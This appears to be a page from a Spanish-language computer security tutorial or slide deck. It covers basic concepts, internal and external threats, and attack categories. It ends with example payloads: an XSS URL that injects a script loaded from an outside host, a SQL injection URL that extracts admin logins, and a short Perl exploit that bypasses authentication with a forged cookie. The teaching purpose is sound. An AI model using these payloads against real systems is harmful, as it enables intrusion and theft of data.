Seguridad Informática
– Fundamentos de la seguridad informática
– Seguridad en ambiente de servidores
– Seguridad en plataformas Web
– Cómo proteger las redes Wi-Fi
– Recomendaciones generales para Internet
Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA CONFIDENCIALIDAD INTEGRIDAD DISPONIBILIDAD AUTENTICIDAD
Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA No existe la absoluta seguridad !!
Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero también una caja fuerte de titanio. ¿Qué es más seguro: la caja de vidrio o la de titanio?
Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla.
Todo se puede vulnerar. La única razón por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea más lento.
Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA Entonces, ¿Cómo nos protegemos de la forma más eficiente posible? Determinando que queremos proteger (ej: Hardware, datos privados, datos públicos, sistemas, etc)? Estableciendo prioridades de los factores a proteger Formando políticas de seguridad Manteniendo la seguridad en el tiempo
Seguridad Informática CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA Debemos enfocarnos en REDUCIR EL RIESGO, y no en tratar de eliminar las amenazas, ya que es imposible.
Para eso debemos saber de QUE o QUIENES nos protegemos y también COMO nos atacan.
Seguridad Informática SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática Ataques Internos
– Premeditación (Empleados mal intencionados o ex empleados con información privilegiada)? – Descuido – Ignorancia – Indiferencia de las politicas de seguridad
Ataques externos
– Hackers, Crackers, Lammers, Script-Kiddies – Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática Ataques Internos
Suplantación de identidad Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)? Robo de información (Ej: para la competencia)? Virus, Troyanos, Gusanos Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc Keylogging – Keycatching Keycatcher: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática Ataques Externos
Ataques contra servicios WEB Cross Site Scripting (XSS)? SQL Injection Exploits Robo de Identidad Denegación de Servicio (DoS) y Denegación de Servicio Distribuido (DDoS)? SPAM VIRUS Phishing (Whishing, Hishing)? Troyanos SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática XSS SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática XSS:
http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='//h4k.in/i.js';document.body.appendChild(a);//';alert(1)//%22;alert(2)//%22;alert(3)//–%3E
SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM admin_login– SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host=shift; if ($host eq "") { print "Usage: webeye-xp.pl < host name>n"; exit; } my $browser = LWP::UserAgent->new(); my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;"); $t = $resp->content; #print $t; "; Ejemplo de un exploit en PERL: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Página siguiente |